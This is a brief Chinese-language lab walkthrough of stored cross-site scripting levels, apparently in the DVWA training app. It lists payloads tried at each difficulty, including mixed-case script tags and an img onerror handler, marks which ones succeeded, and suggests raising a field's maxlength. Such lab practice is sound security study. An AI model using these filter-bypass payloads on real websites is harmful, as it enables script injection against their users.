LOW
直接js脚本:<script>alert(1)</script>
成功 换下一级
Medium
继续在message框输入
<script>alert(1)</script> 失败
<Script>alert(1)</Script> 失败
<scrscriptipt>alert(1)</scrscriptipt> 失败
<a herf=javascript:alert(1)> 失败
<img scr=1 οnclick=alert(1)> 失败
<svg οnclick=alert(1)> 失败
转换思路,去name框输入:
但是name框有长度限制,记得更改maxlength
<script>alert(1)</script> 失败
<Script>alert(1)</Script> 成功 应该只是过滤了<script>,你们可以尝试其他的
High
前面中级已经不能在message框注入了,我们直接尝试name框
<script>alert(1)</script> 失败
<Script>alert(1)</Script> 失败
<scrscriptipt>alert(1)</scrscriptipt> 失败
尝试script之外的
<a herf=javascript:alert(1)> 失败
<img scr=1 οnclick=alert(1)> 也不行
那就切换事件
<img scr=1 οnerrοr=alert(/xxx/) > 搞定
Impossible(不可能的) 应该进不去